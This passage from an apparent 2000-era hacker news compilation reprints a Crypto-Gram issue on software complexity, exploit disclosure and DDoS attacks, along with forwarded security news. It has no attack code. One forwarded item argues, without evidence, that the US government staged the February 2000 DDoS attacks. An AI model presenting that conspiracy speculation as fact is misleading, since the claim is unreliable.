before the MS launch of Windows 2000. Microsoft published a response
shortly thereafter. Both documents are full of marketing spin. Russ
Cooper has written an objective description of the non-issue:
<http://ntbugtraq.ntadvice.com/NDSvsADS-01.asp>
Good security software: a command-line tool for statically scanning C and
C++ source code for security vulnerabilities. It's called ITS4.
<http://www.rstcorp.com/its4/>
Mixter's paper on cracking:
<http://mixter.void.ru/crack.txt>
Excellent essay on the difference between hackers and vandals:
<http://www.villagevoice.com/issues/0007/thieme.shtml>
Commentaries on distributed denial-of-service attacks:
<http://www.pbs.org/cringely/pulpit/pulpit20000217.html>
<http://www.thenation.com/issue/000313/0313klein.shtml>
Usernames and passwords for sale:
<http://www.wired.com/news/politics/0,1283,34515,00.html?tw=wn20000224>
Sony PlayStation 2 is being held up for export (from Japan) due to crypto
in the system:
<http://www.theregister.co.uk/000302-000026.html>
Navajo code-talking GI Joe doll:
<http://www.gijoe.com/lnavajo_code_talker.html>
More speculation about Echelon:
<http://www.zdnet.com/enterprise/stories/security/news/0,7922,2455560,00.html>
<http://www.wired.com/news/politics/0,1283,34932,00.html>
Interesting use of a honey pot by the San Diego Supercomputer Center (or,
SDSC Hacks the Hackers):
<http://security.sdsc.edu/incidents/worm.2000.01.18.shtml>
** *** ***** ******* *********** *************
AES News
The big AES news is the week of 10-14 April, 2000, in New York. Monday,
Tuesday, and Wednesday are the 7th Fast Software Encryption workshop (FSE
2000). Thursday and Friday are the 3rd AES Candidate Conference
(AES3). Both are in the New York Hilton and Towers. FSE 2000 will have
several excellent papers on the AES candidates (new attacks on MARS, RC6,
Rijndael, and Serpent), and AES3 will have nothing but. The papers for FSE
2000 have been selected, and are listed on the Web site. The papers for
AES3 have not been announced yet. (The submission deadline for both
conferences is long past.)
Come, be a part of cryptography history. It'll be fun.
FSE 2000:
<http://www.counterpane.com/fse.html>
AES3:
<http://csrc.nist.gov/encryption/aes/round2/conf3/aes3conf.htm>
** *** ***** ******* *********** *************
Counterpane Internet Security News
Bruce Schneier was interviewed in Business Week:
<http://www.businessweek.com/2000/00_10/b3671089.htm>
** *** ***** ******* *********** *************
Software as a Burglary Tool
This is a weird one. Two people in Minneapolis who allegedly stole
information from their employers were charged with the possession of a
"burglary tool" -- L0phtcrack, the program that automatically breaks
Windows passwords.
The ramifications of this are unclear. There are some burglary tools that
you can't carry unless you are a licensed professional (certain lockpicking
tooks, for example); just having them is illegal. But screwdrivers and
bolt cutters can also be burglary tools if they are used with the intent to
commit a crime.
What it means to me is that the law is getting serious about this.
<http://www.channel4000.com/news/stories/news-20000217-164727.html?&_ref=100
5006010>
** *** ***** ******* *********** *************
The Doghouse: The Virginia Legislature
They recently passed the Uniform Computer Information Transactions Act
(UCITA). It's deeply disturbing. It could be subtitled "The Software
Industry Wish List" for the amount of control (and absence of
accountability) it gives UNDER LAW to software distributors.
Under the UCITA, Microsoft not only doesn't have to fix any of the 63,000
Windows 2000 bugs, it wouldn't even have to tell you any of them
existed. It could also disable the OS of anyone it wants for essentially
any reason it wanted (e.g., failing to abide by the license terms which
restrict you from any public mention of apparent bugs in the software).
The governor has not signed the bill into law yet, but he is expected to.
<http://www.lawnewsnetwork.com/practice/techlaw/news/A16380-2000Feb16.html>
<http://www4.zdnet.com:80/intweek/stories/news/0,4164,2436874,00.html>
<http://www.computerworld.com/home/print.nsf/CWFlash/000215ECDA>
<http://www.cnn.com/2000/TECH/computing/03/07/ucita.idg/index.html>
** *** ***** ******* *********** *************
Software Complexity and Security
The future of digital systems is complexity, and complexity is the worst
enemy of security.
Digital technology has been an unending series of innovations, unintended
consequences, and surprises, and there's no reason to believe that will
stop anytime soon. But there is one thing that has held constant through
it all, and it's that digital systems have gotten more complicated.
We've seen it over the past several years. Microprocessors have gotten
more complex. Operating systems have gotten more complex. Computers have
gotten more complex. Networks have gotten more complex. Individual
networks have combined, further increasing the complexity. I've said it
before, but it's worth repeating: The Internet is probably the most
complex machine mankind has ever built. And it's not getting any simpler
anytime soon.
As a consumer, I think this complexity is great. There are more choices,
more options, more things I can do. As a security professional, I think
it's terrifying. Complexity is the worst enemy of security. This has been
true since the beginning of computers, and is likely to be true for the
foreseeable future. And as cyberspace continues to get more complex, it
will continue to get less secure. There are several reasons why this is true.
The first reason is the number of security bugs. All software contains
bugs. And as the complexity of the software goes up, the number of bugs
goes up. And a percentage of these bugs will affect security.
The second reason is the modularity of complex systems. Complex systems
are necessarily modular; there's no other way to handle the complexity than
by breaking it up into manageable pieces. We could never have made the
Internet as complex and interesting as it is today without modularity. But
increased modularity means increased security flaws, because security often
fails where two modules interact.
We've already seen examples of this as everything becomes
Internet-aware. For years we knew that Internet applications like sendmail
and rlogin had to be secure, but the recent epidemic of macro viruses shows
that Microsoft Word and Excel need to be secure. Java applets not only
need to be secure for the uses they are intended, they also need to be
secure for any other use an attacker might think of. Photocopiers,
maintenance ports on routers, mass storage units: these can all be made
Internet-aware, with the associated security risks. Rogue printer drivers
can compromise Windows NT. Malicious e-mail attachments can tunnel through
firewalls. Convenience features in Microsoft Outlook can compromise security.
The third reason is the increased testing requirements for complex
systems. I've talked elsewhere about security and failure testing. The
only reasonable way to test the security of a system is to perform security
evaluations on it. However, the more complex the system is, the harder a
security evaluation becomes. A more complex system will have more
security-related errors in the specification, design, and
implementation. And unfortunately, the number of errors and the difficulty
of evaluation does not grow in step with the complexity, but in fact grows
much faster.
For the sake of simplicity, let's assume the system has ten different
settings, each with two possible choices. Then there are 45 different
pairs of choices that could interact in unexpected ways, and 1024 different
configurations altogether. Each possible interaction can lead to a
security weakness, and must be explicitly tested. Now, assume that the
system has twenty different settings. This means 190 different pairs of
choices, and about a million different configurations. Thirty different
settings means 435 different pairs and a billion different
configurations. Even slight increases in the complexity of systems mean an
explosion in the number of different configurations . . . any one of which
could hide a security weakness.
The increased number of possible interactions creates more work during the
security evaluation. For a system with a moderate number of options,
checking all the two-option interactions becomes a huge amount of
work. Checking every possible configuration is effectively
impossible. Thus the difficulty of performing security evaluations also
grows very rapidly with increasing complexity. The combination of
additional (potential) weaknesses and a more difficult security analysis
unavoidably results in insecure systems.
The fourth reason is that the more complex a system is, the harder it is to
understand. There are all sorts of vulnerability points -- human-computer
interface, system interactions -- that become much larger when you can't
keep the entire system in your head.
The fifth (and final) reason is the difficulty of analysis. The more
complex a system is, the harder it is to do this kind of
analysis. Everything is more complicated: the specification, the design,
the implementation, the use. And as we've seen again and again, everything
is relevant to security analysis.
A more complex system loses on all fronts. It contains more weaknesses to
start with, its modularity exacerbates those weaknesses, it's harder to
test, it's harder to understand, and it's harder to analyze.
It gets worse: This increase in the number of security weaknesses
interacts destructively with the weakest-link property of security: the
security of the overall system is limited by the security of its weakest
link. Any single weakness can destroy the security of the entire system.
Real systems show no signs of becoming less complex. In fact, they are
becoming more complex faster and faster. Microsoft Windows is a poster
child for this trend to complexity. Windows 3.1, released in 1992, had 3
million lines of code; Windows 95 has 15 million and Windows 98 has 18
million. The original Windows NT (also 1992) had 4 million lines of code;
NT 4.0 (1996) has 16.5 million. In 1998, Windows NT 5.0 was estimated to
have 20 million lines of code; by the time it was renamed Windows 2000 (in
1999) it had between 35 million and 60 million lines of code, depending on
who you believe. (As points of comparison, Solaris has held pretty stable
at about 7 to 8 million lines of code for the last few releases, and Linux,
even with the addition of X Windows and Apache, is still under 5 million
lines of code.)
The size of Windows 2000 is absolutely amazing, and it will have more
security bugs than Windows NT 4.0 and Windows 98 combined. In its defense,
Microsoft has claimed that it spent 500 people-years to make Windows 2000
reliable. I only reprint this number because it will serve to illustrate
how inadequate 500 people-years is.
The networks of the future, necessarily more complex, will be less
secure. The technology industry is driven by demand for features, for
options, for speed. There are no standards for quality or security, and
there is no liability for insecure software. Hence, there is no economic
incentive to create high quality. Instead, there is an economic incentive
to create the lowest quality the market will bear. And unless customers
demand higher quality and better security, this will never change.
I see two alternatives. The first is to recognize that the digital world
will be one of ever-expanding features and options, of ever-faster product
releases, of ever-increasing complexity, and of ever-decreasing
security. This is the world we have today, and we can decide to embrace it
knowingly.
The other choice is to slow down, to simplify, and to try to add
security. Customers won't demand this -- the issues are too complex for
them to understand -- so a consumer advocacy group is required. I can
easily imagine an FDA-like organization for the Internet, but it can take a
decade to approve a new prescription drug for sale, so this solution might
not be economically viable.
I repeat: complexity is the worst enemy of security. Secure systems should
be cut to the bone and made as simple as possible. There is no substitute
for simplicity.
Unfortunately, simplicity goes against everything our digital future stands
for.
** *** ***** ******* *********** *************
Comments from Readers
From: Shawn Hernan <svh@cert.org>
Subject: Full Disclosure
I was intrigued by your recent series of editorials in Crypto-Gram
regarding full-disclosure, and especially, CERT. I am writing to respond
to the article.
Some of your criticisms of CERT are valid, and I agree with them; but I
wanted to point out a couple of things that you may not realize about our
current practices.
When deciding what to publish and when, we use a variety of different criteria.
First, whatever we publish has to be *true* -- we go to great lengths to
validate and verify everything we say in an advisory, and you can imagine
some of the arguments that ensue over what is "true."
Second, as a rule of thumb, our advisories are generally about very serious
problems. We have a formal metric that we use to attempt to put
vulnerabilities on a linear scale of "severity" and we use that as a
first-order estimate of the gravity of the problem, and use our experience
as the final judge. Generally, the problems issued in advisories are in
the 90th percentile of this scale (internally called the "threat metric").
Third, although it may have been true in the past, it has never been the
case in my time here (about 4 years now) that our publication schedule was
dependent on all (or even any) of the fixes being available. We certainly
prefer to have fixes available at publication time, but if we discover that
a vulnerability is being exploited we will publish regardless of the
availability of any fixes or patches. My team (the vulnerability handling
team) works very closely on a daily basis with the incident response team
to understand if a vulnerability is being exploited.
Given all that, I am trying to find responsible, practical ways to publish
more information about vulnerabilities in a variety of forms. We are a
relatively small organization, and I'm not willing to sacrifice truth for
expediency.
From: Ryan Russell <ryan@securityfocus.com>
Subject: Distributing Exploits
You're still not totally consistent in what you say:
>Third, I believe that it is irresponsible, and possibly
>criminal, to distribute exploits.
You've already acknowledged that that's what it takes to get action.
>Reverse-engineering security systems, discovering
>vulnerabilities, and writing research papers about them
>benefits research; it makes us smarter at designing secure
>systems. Distributing exploits just make us more vulnerable.
You acknowledge your behavior being inconsistent with your words, which is
neither here nor there. It not only often takes an exploit, but it takes a
press release sometimes. Thievco released an "exploit" to decode Netscape
passwords a year and a half ago. Netscape did nothing. RST Corp. did the
same, with a press release. That got Netscape's attention.
>For example, Mixter is a German hacker who wrote the
>Tribal Flood Network tool used in some of the distributed
>denial-of-service attacks. I believe he has a lot to answer
>for. His attack tool served no good.
Not true. Were it not for him, we'd probably be looking at mystery tools
that were being used that we didn't have the source for, and couldn't as
easily analyze. Mixter has combated much FUD by showing us exactly the
type of thing that can be used, so that the reporters couldn't run off and
tell the public that the evil hackers have superweapons the security
experts know nothing about.
>It enabled criminals and cost a lot of companies a lot of
>money. Its existence makes networks less secure.
As you say, like any tool, it enables both good and bad guys. As you've
pointed out, the security problem was already there, the tools just
highlight it.
Let me speak to the subtext of your rant against Mixter. Some people think
Mixter may deserve some punishment. I don't, but I can see some of the
logic. Really, I think if anyone deserves punishment, it's the guys who
used the tool.
Did Mixter and even the attackers actually do anything in the spirit of
full disclosure? Yes.
We've been complaining for years about the spoofing problem, and expecting
ISPs to do filtering. Nothing has happened. Mixter put out his
tool. Some meetings to discuss DDoS happened. No actual change to
behavior, but there was some amount of advanced planning, which was good
preparation. Finally, some person (yes, criminal) put their neck on the
line and actually used them. They didn't take down the security sites to
make them look bad. They didn't go after the government. They went after
e-commerce, which I have to assume was designed for maximum reaction.
I think we'll get some action now.
From: Brian Bartholomew <bb@wv.com>
Subject: Publishing exploits
> Second, I believe in giving the vendor advance notice. CERT took
> this to an extreme, sometimes giving the vendor years to fix the
> problem. I'd like to see the researcher tell the vendor that he
> will publish the vulnerability in a month, or three weeks (no fair
> giving the vendor just seven days to fix the problem). Hopefully
> the vulnerability announcement can occur at the same time as the
> patch announcement. This benefits everybody.
Whatever CERT's motivations were, they had the effect of increasing user
trust (because a new sheriff is in town) while decreasing trustability
(because they sat on vulnerabilities users handed off to them). This is
backwards, in two places.
I prefer the following approach: announce existence of vulnerability and
promise a kiddy script in a month; wait a month for vendor to react;
publish kiddy script.
> Publishing vulnerabilities in critical systems that cannot be easily
> fixed and whose exploitation will cause serious harm (e.g., the air
> traffic control system) is bad.
Publishing is *very important* in these cases so the stakeholders know to
reduce their trust in these systems. If air traffic control is vulnerable,
tell me so I can stop taking airplanes!
A non-life-safety version of this problem was the publishing of a script
that gave an existing process root privileges using the memory debugger
abilities of the console monitor ("L1-A") of a Sun. This debugger could be
disabled, but nobody did because it disabled the software reset
button. This reported vulnerability allowed users to adjust their trust of
the security of root sharply downward, corresponding more closely to the
actual security of it in practice.
> Third, I believe that it is irresponsible, and possibly criminal, to
> distribute exploits.
This is gun control: "Don't punish murder, ban the gun instead! Exploits
are an evil instrumentality! Exploits help a good boy go bad!" The right
answer is: Humans are held responsible for their behavior. Guns, bricks,
and exploits are just tools.
From: Greg Guerin <glguerin@amug.org>
Subject: publicity attack loops?
I have to admit that I was chuckling all the way through the
Fernandes/Cryptonym letter in the Feb 2000 Crypto-Gram. Especially when at
the end he wraps himself in the mantle of professional integrity. I've
already written two essays on the Fernandes discovery and his downloadable
"repair" ZIP:
<http://amug.org/~glguerin/opinion/win-nsa-key.html>
<http://amug.org/~glguerin/opinion/crypto-repair-kit.html>
Though neither one is about Fernandes's professional integrity, per se,
they do make a number of points about specific practices. To summarize the
points (see the essays for the full explanation):
1) the ZIP held 2 EXE's, 2 DLL's, and 1 source file.
2) the downloadable ZIP had no digital signature.
3) nothing within the ZIP had a separate digital signature.
4) Fernandes's PGP key had no introducers at all.
5) no pointers to others who could vouch for points 2-4.
6) source was not compilable as supplied (missing header).
Point 6 is only a little important because it means the EXE's must be
trusted as given. But there was only one source file anyway, so you're
already trusting the other EXE completely. And both DLL's must be trusted
completely. Risk-wise, 75% blind trust is virtually identical to 100%
blind trust, so it's not all that useful a distinction. It's like choosing
whether to kill something 3 times over or 4 times -- correctly killing it
once suffices.
Note that at no point does "professional integrity" come into this, only
"professional practice". I'm not disputing INTENT (integrity), I'm only
describing OUTCOME (practice). Spotless integrity and intent cannot long
survive avoidable errors in practice. By observing practices an observer
might infer skill, integrity, or both, or neither. Those judgements, and
the trustworthiness criteria underlying them, are left completely to the
particular observer. All I can say is what I would infer from my
observations, and why. You should draw your own conclusions, since my
criteria for trustworthiness may differ from yours. But you should also
invest in understanding why you came to those conclusions -- flaws in the
process can lead you astray.
From: "Rolf Oppliger" <rolf.oppliger@esecurity.ch>
Subject: Distributed Denial-of-Service Attacks
First of all, I'd like to congratulate you for your description and
analysis of distributed denial-of-service (DDoS) attacks in the February
issue of your Crypto-Gram newsletter. I fully agree with most of your
statements, including your pessimistic view that all existing approaches to
address the problem are unsatisfactory in one way or another.
In your article, however, you also argue that "in the long term,
out-of-band signaling is the only way to deal with many of the
vulnerabilities of the Internet, DDS attacks among them." I don't agree
with this statement. Any out-of-band signaling channel can also be
subjected to DoS and DDoS attacks. I believe that the reason why telephone
networks are not subjected to large-scale DoS and DDoS attacks is due to
the fact that they address charging and billing, rather than their use of
out-of-band signaling (out-of-band signaling has many advantages in other
areas). Trying to establish a huge quantity of connections in a telephone
network is simply too expensive ... I think that the lesson learnt from
telephone networks is that packet-based charging and billing -- combined
with adequate security mechanisms -- may be a viable solution to protect
against large-scale DoS and DDoS attacks on the Internet (rather than
out-of-band signaling). However, packet-based charging and billing also has
many disadvantages, including, for example, a huge administration
overhead. Consequently, I guess that packet-based charging and billing
will not be applied on the Internet, and that "intelligent"
packet-filtering performed by ISPs will be the major weapon to protect
against large-scale DoS and DDoS attacks in the future.
From: Ethan Benatan <benatan@duq.edu>
Subject: Defending Against DOS Attacks: Draining the Swamp
If you'll pardon the musings of a biologist, I'd like to comment on your
swamp analogy. I know you never stated so but it bears pointing out that
swamps are not "bad" in any defensible sense, nor is draining them "good,"
even though doing so may have one immediate desirable consequence. I am
sure that in your own field you can think of many examples where a cure,
though effective, may have been worse than the disease. The RISK here is
forgetting that in any complex system change comes at some cost; the more
complex (or less well understood) the system, the harder it is to predict
the cost. I think this applies to the Internet. It certainly applies to
the natural world, in spades. I will not bore you with examples.
From: pclites@cdsfulfillment.com
Subject: deCCS
In the February 2000 Crypto-Gram, you wrote: "An important point is that
DVDs can be copied and pirated without using deCSS or any other decryption,
which certainly makes the original claim of 'prevents piracy' look either
astoundingly ignorant or brazenly deceptive."
There is a sense in which the "prevents piracy" claim makes sense. deCSS
makes it easy to copy the data on a DVD not just onto another DVD, but into
another format, one which is easier to copy & transmit. In that sense, one
could characterize it as making piracy easier. Kind of like the rationale
behind the distinction between printed & electronic versions of source code
in the original crypto export restrictions; but for a consumer data
product, I think it's a more meaningful distinction. I would have to
characterize the court's ruling as a correct application of a bad law, in
what may turn out to be a watershed case.
From: "Bryan Alexander" <xande1@bellsouth.net>
Subject: Secure Linux
> The NSA has contracted with Secure Computing Corp. for
> a secure version of Linux. Personally, I don't know if
> the Linux license allows the NSA to make a secure version
> of the operating system if they are not going to freely
> distribute the results.
Actually the GPL (Gnu Public License, which covers almost all parts of
Linux) does allow this. There is no language in the license that requires
that you redistribute anything based on the GPL, only what you are required
to do *if* you redistribute a work based on the GPL. In addition, the GNU
Project has said specifically that the license is not intended to prevent
people from creating (without being forced to distribute) their own
modified versions of GPLed software for their own use. The text of the GPL
is located at: <http://www.gnu.org/copyleft/gpl.html>.
A statement about being forced to distribute modified versions of software
being an "unacceptable restriction" can be found at
<http://www.gnu.org/philosophy/apsl.html> under the heading "Disrespect for
Privacy." This is part of a discussion of the "fatal flaws" in the Apple
APSL license. (I can't find the original source for the comment about this
as it relates to the GPL right now, sorry.)
** *** ***** ******* *********** *************
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on computer security and cryptography.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of
Counterpane Internet Security Inc., the author of "Applied Cryptography,"
and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served
on the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on computer security
and cryptography.
Counterpane Internet Security, Inc. is a venture-funded company bringing
innovative managed security solutions to the enterprise.
http://www.counterpane.com/
Copyright (c) 2000 by Counterpane Internet Security, Inc.
@HWA
219.0 ISN:Mar 18th:Microsoft fends off hackers with Windows 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Moderator: Ugh, this is a load. A "syn-flood" is designed to drive up CPU
usage? Windows 2k fended this 'hacker' attack off?]
Forwarded From: "Noonan, Michael D" <mdn@intel.com>
(courtesy of Paul Thurrott's WinInfo - http://www.wininformant.com)
Microsoft fends off hackers with Windows 2000
In a controversial move sure to put the company square in the crosshairs
of every hacker on the planet, Microsoft Corporation announced this week
that it had successfully beaten off a "syn-flood" hacker attack Tuesday.
As the Register's John Lettice notes, the company might have been better
served by keeping the matter quiet. The attack, which is designed to bring
a Web site to its knees by overloading processor capability, did little to
slow down, let alone crash, the heavily clustered Microsoft Web site. The
company says that it suffered only a 3-7% slowdown for a short period of
time.
"It was very minor, to be honest, so some people saw some slowdowns," said
Microsoft spokesperson Adam Sohn. "We have a ton of overhead on this site.
We can support terabytes and terabytes of downloads."
The attack on Microsoft is the latest in a series of Web site attacks in
recent weeks. Most of the previous attacks, which crippled Web sites such
as Yahoo and eBay, were denial of service (DOS) attacks, which are
designed to overload a Web server, making it incapable of serving actual
users. Investigators have yet to pinpoint the culprits in the previous
attacks. Microsoft says that it was able to determine where the attack on
its Web site came from, however. The company alerted authorities and shut
off their access to the company's Web site.
Naturally, Microsoft credited Windows 2000 with saving the day.
"The guys running the network swear to me that a year ago we would have
been in big trouble, but with Windows 2000, nobody could knock our servers
over," Sohn said. "Between the robustness of the OS and the security
features built in, it really helped withstand the attack."
Now doesn't that sound like a challenge?
ISN is sponsored by Security-Focus.COM
@HWA
220.0 ISN:Feds Behind Recent Massive Web Hacking/Fwd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2.23.00
Feds Behind Recent Massive Web Hacking/Fwd
During the unprecedented massive blitz of hack-attacks which brought some
of the world's most active websites to an utter standstill in the second
week of February through implementation of DDoS (distributed denial of
service) tactics, NewsHawk made a basic "call" on the situation. To whit:
we postulated that the hack-attacks, implemented on a scale and to an
extent previously unheard-of, were most likely carried out by spooky
cyber-goon squads in the employ of our beloved federal government.
Since I am by no stretch of anyone's imagination what could even remotely
be considered a computer geek or wirehead, nor am I particularly strong on
researching issues which don't directly concern me, I made my call on the
scene, solicited and published opinions from our mailing list on the
situation and pretty much left it at that.
Well, it turns out I wasn't the ONLY one who was more than a little bit
suspicious that feds may have had more than a little bit to do with the
hacking blitz.
Indeed, MacAddict columnist Rich Pizor outdid us by a mile and actually
researched the background of the whole situation: in particular with
respect to certain proposals for an "Internet Gestapo" kind of deal known
as the Federal Investigation and Detection Network, or FIDNet, which the
Clinton gang had just recently been advancing as a means of "patrolling"
cyberspace. The deafening chorus of either boos, hisses or just plain
silence from all quarters which greeted the Clintonistas' Brave New
World-style proposal caused a retreat of sorts, but according to Pizor's
view, most likely only a temporary one. Indeed, one just long enough for
these gangstas and goons to lick their wounds and come up with a PLAN
which would make everyone fall slavishly in line with their malignant (as
usual) machinations and devious schemes. Namely; the initiation of the
overwhelming hack-attack tidal wave and blitzkrieg which devastated the
Web a couple of weeks ago.
It's an old Machiavellian game. Create a previously non-existent problem,
and then let everyone cry and beg for you to provide a solution.
Sheesh. And you thought WE get out a limb with these kooky conspiracy
scenarios.
But seriously, we think Pizor is in fact ONE HUNDRED PERCENT correct in
his suppositions.
And what's REALLY interesting to us at NewsHawk, considering what we've
put up with lately in terms of "mysteriously" missing or diverted emails
and related malicious harassment, is the notice tacked on the end of
Pizor's article, (which we've reprinted in full below): "We were unable
to bring you this column at it's expected time and place in the Monday
newsletter because our email server was having problems and our web site
may have been under attack. COINCIDENCE?????"
Uh... "coincidence? No f**king WAY! As Charlie Chan used to say: "too many
coincidence, no longer a coincidence."
Get the picture?
=-=-=-=
Trigger Man
by Rich Pizor
mon feb.23
A prevailing stereotype about the Internet is that it's full of
crackpots hawking hair-brained conspiracy theories to anyone who will
listen. Any responsible media outlet should consider it their job to
present a solid, professional appearance in an attempt to countermand
that stereotype. I'm therefore pleased to bring you a crackpot
conspiracy theory of my own, which revealed itself to me when I
connected the dots while reviewing the recent spate of Distributed
Denial of Service (DDoS) attacks.
Before we proceed any further, I must indulge in one act of contrition.
I didn't want to go here. Really, I didn't. But companies and websites
that no one's ever heard of are blaming every little outage or security
flaw on the omni-present shadow of hackers, crackers, cyberterrorists
and iSaboteurs. I feel then that it is my right -- nay, my solemn duty
-- to correct the balance and proffer speculation (since that's all that
any of this really is) as to what might have really happened. Our legal
department also wants me to point out that neither myself,
MacAddict.Com, or Imagine Media are necessarily making any formal
allegations. That being said...
In order to understand the elegance of what's going on here, we need to
go back in time to the middle of last year. It all started with what the
Clinton administration obviously assumed would be an innocuous and
welcome announcement: Clinton had pushed forth a proposal for something
called FIDNet, or the Federal Investigation and Detection Network. A
controversial proposal to say the least, but the plan drew particular
fire in late January as EPIC (among others) loudly denounced the plan,
saying that it would lead to nothing more than an Orwellian information state.
So Clinton (not uncharacteristically) backed down...just days before the
first DDoS attack incapacitated Yahoo for a day, along with twelve other
major sites over the course of the next week -- seven of which have come
forth with reports. Suddenly everything became the fault of crackers. A
man in Virginia was even inspired to launch his own DoS attack on the
Virginia DMV website (he only used his own computer, so there was no
Distributed nature to it).
Certainly coincidental timing for a President who's trying to get an
unreceptive public to go along with his draconian cybersecurity plan.
Especially given Janet Reno's recent testimony before Congress regarding
the need for formalized laws on Internet security, citing those very
attacks as her justification.
But it gets better. Two days after the first attack, the FBI held a
press conference in which they vowed to catch the perpetrator(s) but
also admitted that they didn't have any idea, at that time, who did it.
"A 15-year-old kid could launch these attacks," said the Bureau's Ron
Dick (with a name like that it's no wonder he wound up in the FBI). Only
a few days later, the news bubbles out that they're hot on the trail of
a suspect named "mafiaboy" -- surprise surprise, a 15-year-old kid,
conveniently in Canada and out of the Feds' reach without cooperation
from the Royal Canadian Mounted Police.
Most in the hacking community scoff at the thought that "mafiaboy" could
be involved in anything more than a copycat role. He's widely considered
to be a "script kiddie" -- an amateur cracker seeking fame through his
exploits using tools downloaded off the Internet. So it's puzzling that
the Feds would want him that badly; the name "Lee Harvey Oswald" keeps
coming to mind. It's also unclear why they want to find Mixter -- an
anonymous German hacker who may have authored one or more of the tools
that may have been involved -- when he has publicly stated that he
didn't do it, and the tools he may have authored were never released
publicly except with the intention of studying DDoS attacks and how to
counter them. The only other lead that's been made public is an
anonymous email sent to Attrition.org (a site that archives hacked Web
pages) that even the site's webmaster isn't taking too seriously.
Am I coming right out and saying that the government we elected is
behind all of this? Not directly. I have a hard time seeing most elected
officials even being able to use a word processor, let alone pull off
something like this. But you have to admit, the timing of all of these
events is mighty convenient -- and while it's unlikely that they could
have done it themselves, all it takes is money and connections to
arrange for someone to pull a trigger.
It calls to mind Judd Hirsch's line from Independence Day: "Well you
didn't *really* think they paid $500 for a hammer did you?"
NOTE: We were unable to bring you this column at it's excepted time and
place in the Monday newsletter because our email server was having
problems and our web site may have been under attack. COINCIDENCE?????
Rich Pizor is the pseudonym of the man who claims to be Online Content
Editor for MacAddict.com -- if he told you any more than that, he'd have
to kill you. When he isn't hatching looney theories like this one, Rich
types inflammatory things in chat rooms in the hopes of gaining
immortality in an Echelon log.
ISN is sponsored by Security-Focus.COM
@HWA
221.0 ISN:Hacker 'Gatsby' Gets 18-Month Sentence
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "John Q. Public" <tpublic@dimensional.com>
http://www.foxnews.com/vtech/030500/hack.sml
Hacker 'Gatsby' Gets 18-Month Sentence
7.19 a.m. ET (1219 GMT) March 5, 2000
Associated Press
FOOTNOTE: SAN DIEGO - A computer hacker known online as "The Gatsby" will
spend 18 months in federal prison.
A judge in San Diego has sentenced Jonathan Bosanac for electronically
breaking into some of the country's largest computer systems.
The judge said his wrongdoing caused more than $1 million in damage to one
company alone.
Bosanac was ordered to pay $10,000 in restitution to three telephone
companies he hacked into.
He pleaded guilty in December to participating in one of the nation's
biggest hacking schemes.
The crimes took place more than five years ago. Friends say the man's life
has since turned around. He's been working as a computer consultant.
ISN is sponsored by Security-Focus.COM
@HWA
222.0 ISN:Naval officer in hot water over policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <wk@c4i.org>
http://www.defensenews.com/dtemp/gomez.html
WASHINGTON - A U.S. Navy petty officer who engaged in a recent Internet
discussion of network security issues has inadvertently sparked a major
controversy regarding military operations security, and whether Pentagon
policy has kept up with the Information Age.
Operations security (OPSEC) is closely related to information operations.
Its primary goal is to "force the adversary commander to make faulty
decisions based upon insufficient information and/or to delay the decision
making process due to a lack of information," according to the Pentagon's
joint doctrine written in 1997.
During the height of the Cold War, military members were warned not to
discuss such seemingly harmless things as unit morale, readiness or
upcoming training missions because bits of information can be pieced
together to learn a great deal about military operations.
The Pentagon in October ordered that all military Internet sites be
scrubbed of personal or sensitive tactical information.
Now the Navy is investigating actions taken by Gene Gomez, a petty officer
second class aboard the USS Essex - actions some experts say may provide
potential adversaries with sensitive technical information that could
allow them to infiltrate military networks, or make Gomez and his family
vulnerable to terrorist activity.
While he is under investigation, the former network administrator has been
denied access to the ship's networks, has had his shipboard electronic
mail capabilities disabled, and had his separation of service papers
placed on hold.
Gomez refused to comment on the situation.
"I want to ensure that I don't get into any more trouble," Gomez told
Defense News.
On Dec. 18, Gomez engaged in a discussion on an electronic mailing list
organized by the computer security Internet site AntiOnline. The topic of
the discussion was how to bypass some particular network security
measures. In addition, he used his official electronic mailing address
aboard the Essex, and signed his full name and rank.
The e-mail caught the attention of Rick Forno, co-author of the book, "The
Art of Information Warfare." Forno wrote and published on the Internet an
article, "The Need for Common Sense, Not Only Technical Competence,"
blasting Gomez's actions.
"Several aspects of [Gomez's] electronic mail messages are frightening,
and should serve as a wake-up call to the military leadership regarding
their perceived levels of OPSEC awareness throughout the military," Forno
wrote.
Forno conducted an Internet search on Gomez's name and found that earlier
he had written to Happy Hacker Digest and to a group of so-called white
hat hackers, the network security organization known as L0pht Heavy
Industries.
In these two separate messages, Gomez was seeking advice on how to disable
some network functions he felt could be used to gain unauthorized access.
Forno also found Gomez's personal Internet home page; a wealth of personal
information; and information about the systems the sailor works with,
including the Joint Maritime Command Information System, a strategic level
command and control system.
The article ignited a controversy, and led to a minor cyber war of words
between Forno and Gomez and their respective supporters.
The Pentagon effort to scrub Internet sites of such information did not
address the issue of military members disclosing the same kind of
information on non-military Internet sites.
And Gomez is not the only military member using non-military Internet
sites to disclose information that may not be allowed on military sites.
Lt. Cmdr. Sheila Scarborough, executive officer aboard the USS Fort
McHenry, for example, maintains a personal Internet site that offers
details about her family, life aboard ship, and the ship's operations.
Scarborough did not respond to Defense News questions mailed
electronically.
In addition, the Navy continues to provide daily Internet updates on the
number of personnel on duty, the number of operational aircraft and ships,
and the deployment status of the Fifth, Sixth and Seventh fleets. As of
Jan. 3, the Navy listed 14 ships, 95 aircraft and 7,969 sailors and
marines in the Persian Gulf.
In an interview with Defense News, Forno downplayed the actual damage
Gomez might have done to OPSEC, but said the situation "is indicative of
